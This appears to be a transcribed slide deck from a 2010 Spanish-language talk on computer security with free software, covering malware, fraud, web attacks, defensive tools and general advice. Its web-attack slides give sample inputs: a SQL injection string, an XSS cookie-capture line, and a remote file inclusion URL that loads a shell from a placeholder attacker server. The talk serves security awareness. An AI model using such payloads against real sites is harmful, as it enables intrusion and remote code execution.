Upload
juan-salas-santillana
View
1.144
Download
1
Embed Size (px)
DESCRIPTION
Ponencia "Seguridad informatica con software libre" para la "Flisol Arequipa 2010" por Juan Alfredo Salas Santillana".
Citation preview
Seguridad Informatica con Software Libre
Juan Alfredo Salas Santillana
AGENDA
¿Seguridad Informatica?
Nivel Usuario
- Tipos de Amenazas - Algunos Numeros
- Medidas Basicas a Tomar
Nivel Administrador, Desarrollador – Servidores
- Tipos de Ataques - Factores Fisicos y Otros
- Medidas Basicas a Tomar - Como Ocultarte
Algunas Demostraciones
Ethical Hacking
Recomendaciones
¿Seguridad Informatica?
Integridad
Confidencialidad
Disponibilidad
No Repudio
Tipos de Amenazas
Malware
Fraudes
Amenazas: Malware
VirusKeyloggersTroyanosGusanosSpywareRootkits
Malware: Virus
Destruccion
Replicación mediante usuario
Malware: Keyloggers
Capturan:
-Pulsación de Teclas
-Clicks del Mouse
Malware: Troyanos
Era un Metodo de Infección
Procesos Ocultos
Administración Remota
Se Juntan con Aplicaciones Utiles
Malware: Gusanos
Autoreplicacion
Autopropagación
Aprobechan bugs
Malware: Spyware
Recolectan:
Cache, Contraseñas
Usualmente son barras
Malware: Rootkits
- Consiguen: Privilegios
- Permiten Correr Programas como Root (Administrador)
Amenaza: Fraude
Phishing
Phraming
Skimming
Ingenieria Social Como Tal
Fraude: Phishing
Pesca Victimas
Robar Información
Por: Email (SPAM)
Fraude: Pharming
Envia a una Pagina falsa
Modifica:
”Hosts”
”Cache de DNS”
Fraude: Skimming
Clonación de Tarjetas
Mediante Cajeros
Fraude: Ingenieria Social
Usar la Palabra para convencer
Principios: A Todo nos Gusta que nos Alagen
No nos Gusta Decir ”NO”
Siempre un Gesto de Confianza
Medidas Basicas
Antivirus
Firewall
Filtro AntiSpam
Medidas Basicas: Antivirus
CLAMAV
- Plataforma: Windows- Licencia: GPL- Monitoreo Permanente- Actualizaciones Frecuentes- No Consume Mucha Memoria
Dr. Web (Livecd)
- Plataforma: GNU / Linux- Licencia: GPL- Modo: Booteo- Analiza fuera de Windows
Medidas Basicas: Firewall
Aislamiento
Registro de Uso
Reglas de Transmision
Algunos Numeros
Virus Indetectable: $100 - $300
Cuenta de Correo Robado: $10 - $100
Tarjeta de Credito Robada: $1000
Tipos de Ataques
DOS
Mediante Web
Explotación de bugs
Ataques: DOS
Tratan de Colapsar un Servicio
Algunos Abren Gran Cantidad de sockets
Algunos Realizados Desde una ”Netbot”
Ataques: Mediante Web
Inyeccion SQL
Filtrado Incorrecto de Variables
Ejemplo: '' OR '1'='1'
XSS
Filtrado Incorrecto de Etiquetas
No Afecta en si al Servidor, Solo al Usuario
Ejemplo: $cookie = $_GET[\'cookie\'];
Ataques: Mediante Web
CSRF
Explota la Confianza de la Aplicacion a un Usuario
RFI
Explotable por la mala programacion de ”Include()”Ejemplo: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls
Ataques: Explotacion de Bugs
Usan Vulnerabilidades conocidas
Se corre un script
Puede ser Relizado por un Aprendiz
Medidas Basicas
Firewall
Test de Penetración
Filtrado de Variables
Medidas Basicas: Firewall
IPTABLES
Incluido en el Kernel Linux
Registro de Logs
FIRESTARTER
Licencia: GPL
Facil manejo y configuración
Medidas Basicas: Test de Pentración
NMAP
Escaner de puertos, SO y mas.
Licencia: GPL
METASPLOIT F.
Framework que permite explotar vulnerabilidades.
NESSUS
Escaner de vulnerabilidades
Medidas Basicas: Filtrado de Variables
Factores Fisicos y Otros
Incendios
Inundaciones
Robo Fisico
Defectos y Daños de Hardware
Como Ocultarte
Tor
Algunas Demostraciones
Ethical Hacking
Pasion
Libertad
Conciencia Social
"Ningún problema debería resolverse 2 veces"
Recomendaciones
Nada es 100% Seguro
Filtrar tu Informacion
Encripta tu Informacion
Revisa tus Logs
Nunca Pienses que Nadie se Tomara el Trabajo de Hacerlo